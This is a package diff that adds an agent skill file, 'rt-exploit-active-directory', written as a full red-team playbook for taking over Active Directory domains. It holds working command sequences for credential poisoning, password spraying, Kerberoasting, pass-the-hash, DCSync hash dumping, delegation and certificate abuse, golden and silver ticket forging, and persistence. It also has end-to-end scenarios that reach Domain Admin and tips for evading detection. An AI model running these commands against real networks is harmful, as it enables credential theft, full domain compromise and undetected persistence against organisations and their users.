rtexit-method 0.1.0 → 0.1.2

package/packaged-assets/.agents/skills/rt-exploit-active-directory/SKILL.md

@@ -0,0 +1,1078 @@
+---
+name: rt-exploit-active-directory
+description: "Complete Active Directory penetration testing skill. Domain enumeration with BloodHound/SharpHound, Kerberoasting with GetUserSPNs and hashcat, AS-REP Roasting, Pass-the-Hash with CrackMapExec, Pass-the-Ticket with Rubeus, DCSync with Mimikatz secretsdump, Golden/Silver ticket forging, RBCD delegation abuse, Shadow Credentials, PrintNightmare, and forest trust abuse."
+---
+
+# rt-exploit-active-directory
+
+## Overview
+
+This skill covers the complete Active Directory (AD) attack lifecycle from initial enumeration through full domain compromise. Active Directory is the identity backbone of most enterprise Windows environments, making it a high-value target in red team engagements. Compromising AD typically means game-over for the engagement — domain admin access grants control over every joined system, user account, and resource in the forest.
+
+**When to use this skill:**
+- You have a foothold (shell, credentials, or network access) inside a Windows domain environment
+- You need to escalate from a low-privileged domain user to Domain Admin / Enterprise Admin
+- You are performing an assumed breach assessment starting with domain user credentials
+- You need to demonstrate lateral movement, privilege escalation, or persistence via AD techniques
+- The engagement scope includes internal network / Active Directory attacks
+
+**Attack Philosophy:**
+AD attacks chain together — enumeration reveals paths, those paths lead to credential theft or delegation abuse, and credentials unlock DCSync or ticket forging. Always enumerate before attacking. BloodHound is your map; follow the shortest path to DA.
+
+---
+
+## Prerequisites
+
+### Required Access
+- Network access to the target domain (VPN, direct LAN, or compromised host)
+- At minimum: valid domain credentials (even a low-privileged user account)
+- Ideally: a compromised domain-joined Windows host for in-memory attacks
+
+### Attacker Machine Setup (Kali Linux)
+
+#### Core Tools Installation
+
+```bash
+# Update package list
+sudo apt update && sudo apt upgrade -y
+
+# Impacket suite (essential — GetUserSPNs, secretsdump, psexec, wmiexec, etc.)
+sudo apt install -y python3-impacket impacket-scripts
+# OR install from source for latest version:
+git clone https://github.com/fortra/impacket.git /opt/impacket
+cd /opt/impacket && pip3 install -r requirements.txt && pip3 install -e .
+
+# CrackMapExec (CME) — lateral movement, enumeration, credential testing
+sudo apt install -y crackmapexec
+# OR pipx install for isolation:
+pipx install crackmapexec
+
+# NetExec (nxc) — modern successor to CrackMapExec
+pip3 install netexec
+# OR:
+sudo apt install -y netexec
+
+# BloodHound (graph-based AD attack path analysis)
+sudo apt install -y bloodhound neo4j
+
+# BloodHound Python ingestor (run from Linux without SharpHound)
+pip3 install bloodhound
+
+# Kerbrute — Kerberos username enumeration and password spraying
+wget https://github.com/ropnop/kerbrute/releases/latest/download/kerbrute_linux_amd64 -O /opt/kerbrute
+chmod +x /opt/kerbrute
+sudo ln -s /opt/kerbrute /usr/local/bin/kerbrute
+
+# Enum4linux-ng — SMB/LDAP enumeration
+sudo apt install -y enum4linux-ng
+
+# LDAPsearch / LDAP tools
+sudo apt install -y ldap-utils
+
+# Hashcat — GPU-accelerated password cracking
+sudo apt install -y hashcat
+
+# John the Ripper — alternative password cracker
+sudo apt install -y john
+
+# Evil-WinRM — Windows Remote Management shell
+gem install evil-winrm
+
+# Responder — LLMNR/NBT-NS poisoning for credential capture
+sudo apt install -y responder
+
+# Metasploit Framework
+sudo apt install -y metasploit-framework
+
+# rpcclient / smbclient
+sudo apt install -y samba-common-bin smbclient
+
+# PowerView (download for use via PowerShell on target)
+wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 -O /opt/PowerView.ps1
+
+# Rubeus (pre-compiled binary for Windows target)
+# Download from: https://github.com/GhostPack/Rubeus/releases
+# Keep in /opt/tools/windows/
+
+# Mimikatz (pre-compiled for Windows target)
+# Download from: https://github.com/gentilkiwi/mimikatz/releases
+
+# PKINITtools — for Shadow Credentials and certificate-based attacks
+git clone https://github.com/dirkjanm/PKINITtools /opt/PKINITtools
+pip3 install -r /opt/PKINITtools/requirements.txt
+
+# Certipy — AD CS (Certificate Services) attacks
+pip3 install certipy-ad
+
+# pywhisker — Shadow Credentials from Linux
+git clone https://github.com/ShutdownRepo/pywhisker /opt/pywhisker
+pip3 install -r /opt/pywhisker/requirements.txt
+
+# LDAPRelayScanner / ntlmrelayx
+# ntlmrelayx is part of Impacket
+
+# crackmapexec wordlists
+sudo apt install -y wordlists
+sudo gunzip /usr/share/wordlists/rockyou.txt.gz 2>/dev/null || true
+```
+
+#### Environment Configuration
+
+```bash
+# Set DNS to the Domain Controller for all domain resolution
+sudo resolvectl dns eth0 <DC_IP>
+# OR edit /etc/resolv.conf:
+echo "nameserver <DC_IP>" | sudo tee /etc/resolv.conf
+
+# Add domain to /etc/hosts for quick resolution
+echo "<DC_IP>  dc01.corp.local corp.local" | sudo tee -a /etc/hosts
+
+# Sync time with DC (critical for Kerberos — clock skew > 5 min breaks everything)
+sudo ntpdate <DC_IP>
+# OR:
+sudo timedatectl set-ntp false
+sudo rdate -n <DC_IP>
+
+# Set domain variables for convenience
+export DOMAIN="corp.local"
+export DC_IP="192.168.1.10"
+export DC_HOST="dc01.corp.local"
+export USER="jdoe"
+export PASS="Password123"
+export HASH="aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0"
+```
+
+---
+
+## Skill Levels
+
+### BEGINNER — Domain Reconnaissance & Credential Capture
+
+**Goal:** Enumerate the domain without prior credentials; capture or guess initial credentials.
+
+Techniques: LLMNR/NBT-NS poisoning, Kerberos enumeration, anonymous LDAP, SMB null sessions, password spraying.
+
+---
+
+### INTERMEDIATE — Kerberoasting, AS-REP Roasting, Lateral Movement
+
+**Goal:** Extract service ticket hashes or AS-REP hashes for offline cracking; move laterally with captured credentials.
+
+Techniques: Kerberoasting, AS-REP Roasting, Pass-the-Hash, SMB lateral movement with CME, WinRM shells.
+
+---
+
+### ADVANCED — Delegation Abuse, Shadow Credentials, DCSync
+
+**Goal:** Abuse misconfigured delegation, certificate services, or replication rights to extract domain hashes.
+
+Techniques: Unconstrained/Constrained/RBCD delegation, Shadow Credentials, DCSync, PrintNightmare.
+
+---
+
+### EXPERT — Golden/Silver Tickets, Forest Trust Abuse, Persistence
+
+**Goal:** Forge tickets for persistent, undetectable access; abuse cross-forest trusts to pivot between domains.
+
+Techniques: Golden ticket, Silver ticket, Diamond ticket, SID history injection, cross-forest trust keys, AdminSDHolder persistence.
+
+---
+
+## Step-by-Step Attack Workflow
+
+### Phase 1: Pre-Authentication Enumeration (No Credentials)
+
+#### Step 1 — Network Discovery & DC Identification
+
+```bash
+# Identify the domain controller via DNS
+nslookup -type=SRV _ldap._tcp.dc._msdcs.$DOMAIN $DC_IP
+
+# Enumerate DC with nmap
+nmap -sV -p 53,88,135,139,389,445,464,636,3268,3269,5985,9389 $DC_IP
+
+# Quick SMB enumeration (null session)
+enum4linux-ng -A $DC_IP 2>/dev/null
+smbclient -L //$DC_IP -N
+
+# Check for LDAP anonymous bind
+ldapsearch -x -h $DC_IP -b "DC=corp,DC=local" -s base "(objectClass=*)" | head -50
+```
+
+#### Step 2 — LLMNR/NBT-NS Poisoning (Credential Capture)
+
+```bash
+# Start Responder to poison LLMNR/NBT-NS/mDNS requests
+# This captures NTLMv2 hashes when users/systems mistype hostnames
+sudo responder -I eth0 -wrf
+
+# Responder captures appear in /usr/share/responder/logs/
+# Example captured hash:
+# jdoe::CORP:aabbccdd11223344:HASH:Challenge
+
+# Crack NTLMv2 hash with hashcat
+hashcat -m 5600 /usr/share/responder/logs/SMB-NTLMv2-*.txt \
+  /usr/share/wordlists/rockyou.txt --force
+```
+
+#### Step 3 — Username Enumeration via Kerberos
+
+```bash
+# Enumerate valid usernames without a password (AS-REQ pre-auth check)
+kerbrute userenum \
+  --dc $DC_IP \
+  --domain $DOMAIN \
+  /usr/share/seclists/Usernames/xato-net-10-million-usernames-ug.txt \
+  -o valid_users.txt
+
+# Generate username list from OSINT (firstname.lastname, first.last, etc.)
+# Then enumerate:
+kerbrute userenum --dc $DC_IP --domain $DOMAIN custom_users.txt
+```
+
+#### Step 4 — Password Spraying
+
+```bash
+# Spray a single password across all valid usernames
+# WARNING: Check lockout policy first — 1 wrong guess per 30 min is safe
+# Check lockout with: enum4linux-ng -P $DC_IP
+
+kerbrute passwordspray \
+  --dc $DC_IP \
+  --domain $DOMAIN \
+  valid_users.txt \
+  "Winter2024!" \
+  -o spray_results.txt
+
+# CME password spray (SMB)
+crackmapexec smb $DC_IP \
+  -u valid_users.txt \
+  -p "Winter2024!" \
+  --continue-on-success \
+  2>/dev/null | grep "+"
+
+# CME password spray (multiple passwords — slow, respect lockout)
+crackmapexec smb $DC_IP \
+  -u valid_users.txt \
+  -p passwords.txt \
+  --no-bruteforce \
+  --continue-on-success
+```
+
+---
+
+### Phase 2: Domain Enumeration (With Credentials)
+
+#### Step 5 — BloodHound Data Collection
+
+```bash
+# Method A: BloodHound Python (from Kali, no file on target needed)
+bloodhound-python \
+  -d $DOMAIN \
+  -u $USER \
+  -p "$PASS" \
+  -c All \
+  --zip \
+  -ns $DC_IP
+
+# Method B: SharpHound via CME (uploads and executes on target)
+crackmapexec smb $DC_IP \
+  -u $USER -p "$PASS" \
+  -M bloodhound \
+  --options
+
+# Method C: BloodHound Python with pass-the-hash
+bloodhound-python \
+  -d $DOMAIN \
+  --hashes $HASH \
+  -u $USER \
+  -c All \
+  --zip \
+  -ns $DC_IP
+
+# Start Neo4j and BloodHound
+sudo neo4j start
+bloodhound &
+# Upload the ZIP file, then run built-in queries:
+# "Find Shortest Paths to Domain Admins"
+# "Find Principals with DCSync Rights"
+# "Shortest Path to Unconstrained Delegation Systems"
+```
+
+#### Step 6 — LDAP Enumeration
+
+```bash
+# Enumerate all users
+ldapsearch -x -H ldap://$DC_IP \
+  -D "$USER@$DOMAIN" -w "$PASS" \
+  -b "DC=corp,DC=local" \
+  "(objectClass=user)" \
+  sAMAccountName userPrincipalName memberOf pwdLastSet \
+  > ldap_users.txt
+
+# Enumerate groups
+ldapsearch -x -H ldap://$DC_IP \
+  -D "$USER@$DOMAIN" -w "$PASS" \
+  -b "DC=corp,DC=local" \
+  "(objectClass=group)" \
+  cn member > ldap_groups.txt
+
+# Enumerate computers
+ldapsearch -x -H ldap://$DC_IP \
+  -D "$USER@$DOMAIN" -w "$PASS" \
+  -b "DC=corp,DC=local" \
+  "(objectClass=computer)" \
+  cn operatingSystem dNSHostName > ldap_computers.txt
+
+# Find accounts with no pre-auth required (AS-REP Roasting targets)
+ldapsearch -x -H ldap://$DC_IP \
+  -D "$USER@$DOMAIN" -w "$PASS" \
+  -b "DC=corp,DC=local" \
+  "(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" \
+  sAMAccountName
+
+# Find accounts with SPNs set (Kerberoasting targets)
+ldapsearch -x -H ldap://$DC_IP \
+  -D "$USER@$DOMAIN" -w "$PASS" \
+  -b "DC=corp,DC=local" \
+  "(&(objectClass=user)(servicePrincipalName=*))" \
+  sAMAccountName servicePrincipalName
+```
+
+#### Step 7 — CME Enumeration
+
+```bash
+# Enumerate shares
+crackmapexec smb $DC_IP -u $USER -p "$PASS" --shares
+
+# Enumerate logged-on users across subnet
+crackmapexec smb 192.168.1.0/24 -u $USER -p "$PASS" --loggedon-users
+
+# Find local admins across subnet
+crackmapexec smb 192.168.1.0/24 -u $USER -p "$PASS" --local-groups "Administrators"
+
+# Enumerate password policy
+crackmapexec smb $DC_IP -u $USER -p "$PASS" --pass-pol
+
+# Spider shares for sensitive files
+crackmapexec smb $DC_IP -u $USER -p "$PASS" -M spider_plus
+```
+
+---
+
+### Phase 3: Credential Attacks
+
+#### Step 8 — Kerberoasting
+
+```bash
+# Request service tickets for all SPNs and extract hashes (from Linux)
+impacket-GetUserSPNs \
+  "$DOMAIN/$USER:$PASS" \
+  -dc-ip $DC_IP \
+  -request \
+  -outputfile kerberoast_hashes.txt
+
+# With NTLM hash instead of password
+impacket-GetUserSPNs \
+  "$DOMAIN/$USER" \
+  -hashes $HASH \
+  -dc-ip $DC_IP \
+  -request \
+  -outputfile kerberoast_hashes.txt
+
+# Crack with hashcat (TGS-REP / RC4 = mode 13100, AES256 = mode 19700)
+hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt \
+  --force -O
+
+# AES-encrypted TGS cracking (slower)
+hashcat -m 19700 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt \
+  --force -O
+
+# On Windows target with Rubeus:
+# Rubeus.exe kerberoast /format:hashcat /outfile:hashes.txt
+# Rubeus.exe kerberoast /user:svc_sql /format:hashcat
+```
+
+#### Step 9 — AS-REP Roasting
+
+```bash
+# Find and roast accounts with pre-auth disabled (no creds needed)
+impacket-GetNPUsers \
+  "$DOMAIN/" \
+  -dc-ip $DC_IP \
+  -no-pass \
+  -usersfile valid_users.txt \
+  -outputfile asrep_hashes.txt \
+  -format hashcat
+
+# With credentials (enumerate then roast)
+impacket-GetNPUsers \
+  "$DOMAIN/$USER:$PASS" \
+  -dc-ip $DC_IP \
+  -request \
+  -outputfile asrep_hashes.txt \
+  -format hashcat
+
+# Crack AS-REP hashes (mode 18200)
+hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt \
+  --force -O
+
+# On Windows with Rubeus:
+# Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt
+```
+
+---
+
+### Phase 4: Lateral Movement
+
+#### Step 10 — Pass-the-Hash (PtH)
+
+```bash
+# Test PtH against a target host
+crackmapexec smb <TARGET_IP> \
+  -u Administrator \
+  -H "aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0"
+
+# Spray hash across subnet
+crackmapexec smb 192.168.1.0/24 \
+  -u Administrator \
+  -H "<NTLM_HASH>" \
+  --local-auth \
+  2>/dev/null | grep "+"
+
+# Get a shell via PtH (impacket psexec)
+impacket-psexec \
+  -hashes "$HASH" \
+  "$DOMAIN/Administrator@<TARGET_IP>"
+
+# WMI shell via PtH
+impacket-wmiexec \
+  -hashes "$HASH" \
+  "$DOMAIN/Administrator@<TARGET_IP>"
+
+# SMBexec (stealthier than psexec — no file written to disk)
+impacket-smbexec \
+  -hashes "$HASH" \
+  "$DOMAIN/Administrator@<TARGET_IP>"
+
+# Evil-WinRM via PtH (WinRM must be enabled)
+evil-winrm -i <TARGET_IP> \
+  -u Administrator \
+  -H "<NT_HASH>"
+```
+
+#### Step 11 — Pass-the-Ticket (PtT)
+
+```bash
+# Export Kerberos tickets from memory (Windows — requires local admin)
+# On Windows with Rubeus:
+# Rubeus.exe dump /service:krbtgt /nowrap    # export TGT
+# Rubeus.exe dump /luid:0x3e4 /nowrap        # export by logon session
+
+# Convert .kirbi to .ccache for Linux use
+impacket-ticketConverter ticket.kirbi ticket.ccache
+
+# Use ticket on Linux
+export KRB5CCNAME=/path/to/ticket.ccache
+impacket-psexec -k -no-pass "$DOMAIN/user@<TARGET>"
+
+# Request TGS for specific service using TGT
+# On Windows with Rubeus:
+# Rubeus.exe asktgs /ticket:<base64_TGT> /service:cifs/dc01.corp.local /ptt
+
+# impacket getST — request a service ticket
+impacket-getST \
+  -k -no-pass \
+  -spn "cifs/dc01.corp.local" \
+  "$DOMAIN/user"
+```
+
+---
+
+### Phase 5: Privilege Escalation
+
+#### Step 12 — DCSync (Domain Replication)
+
+```bash
+# DCSync using secretsdump — dumps all domain hashes
+# Requires: Domain Admin, or account with Replicating Directory Changes + All
+impacket-secretsdump \
+  "$DOMAIN/$USER:$PASS@$DC_IP" \
+  -just-dc \
+  -outputfile domain_hashes.txt
+
+# DCSync with NTLM hash
+impacket-secretsdump \
+  -hashes "$HASH" \
+  "$DOMAIN/$USER@$DC_IP" \
+  -just-dc \
+  -outputfile domain_hashes.txt
+
+# DCSync with Kerberos ticket
+export KRB5CCNAME=admin.ccache
+impacket-secretsdump \
+  -k -no-pass \
+  "$DC_HOST" \
+  -just-dc
+
+# Dump specific user (krbtgt for golden ticket)
+impacket-secretsdump \
+  "$DOMAIN/$USER:$PASS@$DC_IP" \
+  -just-dc-user krbtgt
+
+# On Windows with Mimikatz:
+# lsadump::dcsync /domain:corp.local /user:krbtgt
+# lsadump::dcsync /domain:corp.local /all /csv
+```
+
+#### Step 13 — Unconstrained Delegation Abuse
+
+```bash
+# Find computers with unconstrained delegation
+ldapsearch -x -H ldap://$DC_IP \
+  -D "$USER@$DOMAIN" -w "$PASS" \
+  -b "DC=corp,DC=local" \
+  "(&(objectClass=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" \
+  cn dNSHostName
+
+# If you compromise an unconstrained delegation host:
+# 1. Coerce DC authentication to your host using PrinterBug/PetitPotam
+# On Windows with Rubeus (on the delegation host):
+# Rubeus.exe monitor /interval:5 /nowrap    # monitor for incoming tickets
+
+# Trigger coercion from Linux (SpoolSample / MS-RPRN)
+# pip3 install printerbug
+python3 /opt/printerbug/printerbug.py \
+  "$DOMAIN/$USER:$PASS@$DC_IP" \
+  <DELEGATION_HOST_IP>
+
+# Or use PetitPotam (unauthenticated in some cases)
+python3 /opt/PetitPotam/PetitPotam.py \
+  <DELEGATION_HOST_IP> \
+  $DC_IP
+
+# The DC's TGT lands in memory on the delegation host
+# Export it with Rubeus, then use for DCSync
+```
+
+#### Step 14 — RBCD (Resource-Based Constrained Delegation) Abuse
+
+```bash
+# Prerequisites: Write access to msDS-AllowedToActOnBehalfOfOtherIdentity
+# on target computer object (via GenericWrite, WriteProperty, or computer create rights)
+
+# Step A: Create a fake computer account (if we have MAQ > 0)
+impacket-addcomputer \
+  "$DOMAIN/$USER:$PASS" \
+  -computer-name "FAKE$" \
+  -computer-pass "FakePass123!" \
+  -dc-ip $DC_IP
+
+# Step B: Set RBCD — allow FAKE$ to delegate to TARGET
+python3 /opt/impacket/examples/rbcd.py \
+  -f "FAKE$" \
+  -t "TARGET_COMPUTER$" \
+  -dc-ip $DC_IP \
+  "$DOMAIN/$USER:$PASS"
+
+# Alternative with bloodyAD:
+pip3 install bloodyad
+bloodyAD \
+  -u $USER -p "$PASS" \
+  -d $DOMAIN \
+  --host $DC_IP \
+  set object "TARGET_COMPUTER$" \
+  msDS-AllowedToActOnBehalfOfOtherIdentity \
+  '(sAMAccountName=FAKE$)'
+
+# Step C: Request a service ticket impersonating Administrator
+impacket-getST \
+  -spn "cifs/TARGET_COMPUTER.corp.local" \
+  -impersonate Administrator \
+  -dc-ip $DC_IP \
+  "$DOMAIN/FAKE$:FakePass123!"
+
+# Step D: Use the ticket
+export KRB5CCNAME=Administrator@cifs_TARGET_COMPUTER.corp.local@CORP.LOCAL.ccache
+impacket-psexec -k -no-pass "Administrator@TARGET_COMPUTER.corp.local"
+```
+
+#### Step 15 — Shadow Credentials
+
+```bash
+# Prerequisites: Write access to msDS-KeyCredentialLink attribute of a target account
+
+# From Linux with pywhisker
+python3 /opt/pywhisker/pywhisker.py \
+  -d $DOMAIN \
+  -u $USER \
+  -p "$PASS" \
+  --dc-ip $DC_IP \
+  --target "TARGET_USER" \
+  --action add
+
+# pywhisker outputs a .pfx file and password
+# Use with PKINITtools to get a TGT
+python3 /opt/PKINITtools/gettgtpkinit.py \
+  -cert-pfx <pfx_file> \
+  -pfx-pass <pfx_password> \
+  "$DOMAIN/TARGET_USER" \
+  target_user.ccache
+
+# Get NT hash via PKINIT unpac-the-hash
+python3 /opt/PKINITtools/getnthash.py \
+  -key <AS_REP_key> \
+  "$DOMAIN/TARGET_USER"
+
+# From Windows with Whisker (C# tool):
+# Whisker.exe add /target:TARGET_USER
+# Then use Rubeus with the .pfx to get TGT
+```
+
+#### Step 16 — AD CS / Certificate Services Attacks (Certipy)
+
+```bash
+# Find vulnerable certificate templates (ESC1-ESC8)
+certipy find \
+  -u "$USER@$DOMAIN" \
+  -p "$PASS" \
+  -dc-ip $DC_IP \
+  -vulnerable \
+  -stdout
+
+# ESC1: Enroll in a template that allows SAN and Client Auth
+certipy req \
+  -u "$USER@$DOMAIN" \
+  -p "$PASS" \
+  -dc-ip $DC_IP \
+  -target <CA_HOST> \
+  -ca "corp-CA" \
+  -template "VulnTemplate" \
+  -upn "administrator@corp.local"
+
+# Use the certificate to authenticate and get TGT
+certipy auth \
+  -pfx administrator.pfx \
+  -dc-ip $DC_IP
+
+# This yields: administrator's NTLM hash + TGT
+```
+
+---
+
+### Phase 6: Persistence & Post-Exploitation
+
+#### Step 17 — Golden Ticket Forging
+
+```bash
+# Requirements: krbtgt hash (from DCSync), Domain SID
+
+# Get Domain SID
+impacket-getPac \
+  -targetUser administrator \
+  "$DOMAIN/$USER:$PASS"
+# OR from secretsdump output
+
+# Forge Golden Ticket with Impacket
+impacket-ticketer \
+  -nthash <KRBTGT_NTLM_HASH> \
+  -domain-sid <DOMAIN_SID> \
+  -domain $DOMAIN \
+  -groups "512,513,518,519,520" \
+  Administrator
+
+# Resulting: Administrator.ccache
+export KRB5CCNAME=Administrator.ccache
+impacket-psexec -k -no-pass "Administrator@$DC_HOST"
+
+# On Windows with Mimikatz:
+# kerberos::golden /user:Administrator /domain:corp.local
+#   /sid:S-1-5-21-xxx /krbtgt:<hash> /ptt
+# kerberos::golden /user:FakeAdmin /domain:corp.local
+#   /sid:S-1-5-21-xxx /krbtgt:<hash> /ticket:golden.kirbi
+
+# Diamond Ticket (harder to detect — uses real TGT as base)
+# Rubeus.exe diamond /krbkey:<krbtgt_aes256> /user:Administrator /enctype:aes
+```
+
+#### Step 18 — Silver Ticket Forging
+
+```bash
+# Requirements: target machine account hash (from secretsdump), Domain SID
+# Silver ticket is for a specific service — no DC communication needed
+
+# Forge Silver Ticket for CIFS on a specific host
+impacket-ticketer \
+  -nthash <MACHINE_ACCOUNT_HASH> \
+  -domain-sid <DOMAIN_SID> \
+  -domain $DOMAIN \
+  -spn "cifs/FILESERVER.corp.local" \
+  Administrator
+
+export KRB5CCNAME=Administrator.ccache
+impacket-smbclient -k -no-pass "Administrator@FILESERVER.corp.local"
+
+# Common silver ticket SPNs:
+# cifs/<host>      — file access, psexec
+# host/<host>      — scheduled tasks, service control
+# http/<host>      — WinRM, web services
+# MSSQLSvc/<host>  — SQL Server
+```
+
+#### Step 19 — Forest Trust Abuse
+
+```bash
+# Enumerate trusts
+ldapsearch -x -H ldap://$DC_IP \
+  -D "$USER@$DOMAIN" -w "$PASS" \
+  -b "DC=corp,DC=local" \
+  "(objectClass=trustedDomain)" \
+  name trustDirection trustType
+
+# Get trust keys (requires DA in source domain)
+impacket-secretsdump \
+  "$DOMAIN/Administrator:$PASS@$DC_IP" \
+  -just-dc | grep -i trust
+
+# Forge inter-realm TGT for trusted forest
+impacket-ticketer \
+  -nthash <INTER_REALM_TRUST_KEY> \
+  -domain-sid <SOURCE_DOMAIN_SID> \
+  -domain $DOMAIN \
+  -extra-sid <TARGET_DOMAIN_ENTERPRISE_ADMINS_SID> \
+  -spn "krbtgt/TARGET_DOMAIN" \
+  Administrator
+
+# Request TGS in target forest using the forged TGT
+export KRB5CCNAME=Administrator.ccache
+impacket-getST \
+  -k -no-pass \
+  -spn "cifs/dc.target.forest" \
+  "target.forest/Administrator"
+```
+
+#### Step 20 — AdminSDHolder Persistence
+
+```bash
+# AdminSDHolder propagates ACLs to protected groups every 60 min (SDProp)
+# Adding ourselves to AdminSDHolder ACL gives persistent DA-level rights
+
+# From Linux with impacket / dacledit
+python3 /opt/impacket/examples/dacledit.py \
+  "$DOMAIN/$USER:$PASS" \
+  -dc-ip $DC_IP \
+  -principal "$USER" \
+  -target "CN=AdminSDHolder,CN=System,DC=corp,DC=local" \
+  -action write \
+  -rights FullControl
+
+# From Windows with PowerView:
+# Add-ObjectACL -TargetIdentity "AdminSDHolder"
+#   -PrincipalIdentity jdoe -Rights All
+```
+
+---
+
+## Real Attack Scenarios
+
+### Scenario 1: Low-Privileged User to Domain Admin via Kerberoasting
+
+**Context:** You have phished a domain user credential (`helpdesk:Helpdesk2024`). No local admin rights.
+
+```bash
+# 1. Enumerate domain
+export USER=helpdesk PASS=Helpdesk2024 DOMAIN=corp.local DC_IP=10.10.10.5
+
+# 2. Collect BloodHound data
+bloodhound-python -d $DOMAIN -u $USER -p "$PASS" -c All --zip -ns $DC_IP
+
+# 3. Find kerberoastable accounts (BloodHound shows svc_sql has path to DA)
+impacket-GetUserSPNs "$DOMAIN/$USER:$PASS" -dc-ip $DC_IP -request \
+  -outputfile hashes.txt
+
+# 4. Crack the hash
+hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt --force
+# Result: svc_sql:Sql@dmin2023
+
+# 5. Verify DA membership
+crackmapexec smb $DC_IP -u svc_sql -p "Sql@dmin2023" -d $DOMAIN
+
+# 6. DCSync as svc_sql (it has Replication rights per BloodHound)
+impacket-secretsdump "$DOMAIN/svc_sql:Sql@dmin2023@$DC_IP" -just-dc \
+  -outputfile all_hashes.txt
+
+# 7. PtH as Domain Admin
+impacket-psexec -hashes "aad3...:$(grep 'Administrator:::' all_hashes.txt | cut -d: -f4)" \
+  "$DOMAIN/Administrator@$DC_IP"
+
+# Time to DA: ~30 minutes
+```
+
+---
+
+### Scenario 2: No Credentials — LLMNR Poison to DA via RBCD
+
+**Context:** Network access only. No credentials. Windows AD environment.
+
+```bash
+# 1. Start Responder to capture hashes
+sudo responder -I eth0 -wrf
+# Wait for LLMNR/NBT-NS event — get NTLMv2 hash of WORKSTATION$
+
+# 2. Crack the hash (or relay it)
+hashcat -m 5600 SMBNTLMv2-hash.txt /usr/share/wordlists/rockyou.txt --force
+# Result: jsmith:Summer2024!
+
+# 3. Enumerate with captured creds
+export USER=jsmith PASS="Summer2024!" DOMAIN=corp.local DC_IP=10.10.10.5
+bloodhound-python -d $DOMAIN -u $USER -p "$PASS" -c All --zip -ns $DC_IP
+
+# 4. BloodHound shows jsmith has GenericWrite on FILESERVER$
+
+# 5. RBCD attack: Create attacker-controlled computer
+impacket-addcomputer "$DOMAIN/$USER:$PASS" -computer-name "ATTK$" \
+  -computer-pass "Attk@Pass1!" -dc-ip $DC_IP
+
+# 6. Set RBCD on FILESERVER$
+python3 /opt/impacket/examples/rbcd.py \
+  -f "ATTK$" -t "FILESERVER$" -dc-ip $DC_IP "$DOMAIN/$USER:$PASS"
+
+# 7. Get admin service ticket for FILESERVER
+impacket-getST -spn "cifs/FILESERVER.corp.local" \
+  -impersonate Administrator -dc-ip $DC_IP \
+  "$DOMAIN/ATTK$:Attk@Pass1!"
+
+# 8. Access FILESERVER as Administrator
+export KRB5CCNAME=Administrator@cifs_FILESERVER.corp.local@CORP.LOCAL.ccache
+impacket-psexec -k -no-pass Administrator@FILESERVER.corp.local
+
+# 9. Dump LSASS on FILESERVER — find DA session
+# On target: Rubeus.exe dump /nowrap
+# Find a DA TGT and import it
+
+# 10. Use DA TGT for DCSync
+impacket-secretsdump -k -no-pass $DC_HOST -just-dc
+```
+
+---
+
+### Scenario 3: Shadow Credentials + AD CS Chain
+
+**Context:** You have write access to a computer object (via ownership or ACL). AD CS is deployed.
+
+```bash
+# 1. Add shadow credential to TARGET_COMPUTER$
+python3 /opt/pywhisker/pywhisker.py \
+  -d $DOMAIN -u $USER -p "$PASS" --dc-ip $DC_IP \
+  --target "TARGET_COMPUTER$" --action add
+# Output: shadow_cert.pfx, password: P@ssw0rd123
+
+# 2. Use certificate to get TGT for TARGET_COMPUTER$
+python3 /opt/PKINITtools/gettgtpkinit.py \
+  -cert-pfx shadow_cert.pfx -pfx-pass "P@ssw0rd123" \
+  "$DOMAIN/TARGET_COMPUTER$" computer.ccache
+
+# 3. S4U2Self to impersonate Administrator on TARGET_COMPUTER
+export KRB5CCNAME=computer.ccache
+python3 /opt/PKINITtools/gets4uticket.py \
+  kerberos+ccache://$DOMAIN\\TARGET_COMPUTER\$:computer.ccache@$DC_HOST \
+  "cifs/TARGET_COMPUTER.corp.local@$DOMAIN" \
+  Administrator \
+  admin_on_target.ccache
+
+# 4. Access target as Administrator
+export KRB5CCNAME=admin_on_target.ccache
+impacket-smbclient -k -no-pass Administrator@TARGET_COMPUTER.corp.local
+
+# 5. Certipy to escalate further if vulnerable CA exists
+certipy find -u "$USER@$DOMAIN" -p "$PASS" -dc-ip $DC_IP -vulnerable
+# If ESC1/ESC3 found — request cert as DA
+certipy req -u "$USER@$DOMAIN" -p "$PASS" -dc-ip $DC_IP \
+  -target <CA_HOST> -ca "corp-CA" -template "ESC1Template" \
+  -upn "administrator@corp.local"
+certipy auth -pfx administrator.pfx -dc-ip $DC_IP
+# Full NTLM hash + TGT for Domain Admin
+```
+
+---
+
+## OPSEC Considerations
+
+### High-Detection Risk Activities
+
+| Technique | Detection Risk | Reason |
+|---|---|---|
+| BloodHound / SharpHound full collection | HIGH | Massive LDAP query volume in short time |
+| Kerberoasting all SPNs at once | MEDIUM-HIGH | Unusual TGS-REQ burst for service accounts |
+| DCSync | HIGH | Replication traffic from non-DC source |
+| PsExec (impacket) | HIGH | Creates PSEXESVC service, writes to disk |
+| LLMNR Poisoning (Responder) | MEDIUM | ARP anomalies, LLMNR responses from unexpected host |
+| Password Spraying | MEDIUM-HIGH | Multiple failed logons across accounts |
+| PrinterBug / PetitPotam coercion | HIGH | Unusual RPC calls, event ID 4648 |
+
+### Low-Detection Alternatives
+
+```bash
+# Instead of BloodHound full collection — query incrementally
+bloodhound-python -c DCOnly ...          # Only DC data, no session enum
+bloodhound-python -c Group,ACL ...       # Specific collection methods
+
+# Kerberoast only targeted SPNs (not all at once)
+impacket-GetUserSPNs "$DOMAIN/$USER:$PASS" -dc-ip $DC_IP \
+  -request-user svc_sql                  # Single target, not bulk
+
+# Use WMIexec or SMBexec instead of PSexec (less noisy)
+impacket-wmiexec "$DOMAIN/Admin@TARGET" -hashes "$HASH"
+impacket-smbexec "$DOMAIN/Admin@TARGET" -hashes "$HASH"
+
+# Slow password spray (1 attempt per 30 min per account)
+# Respect lockout threshold — check before spraying
+
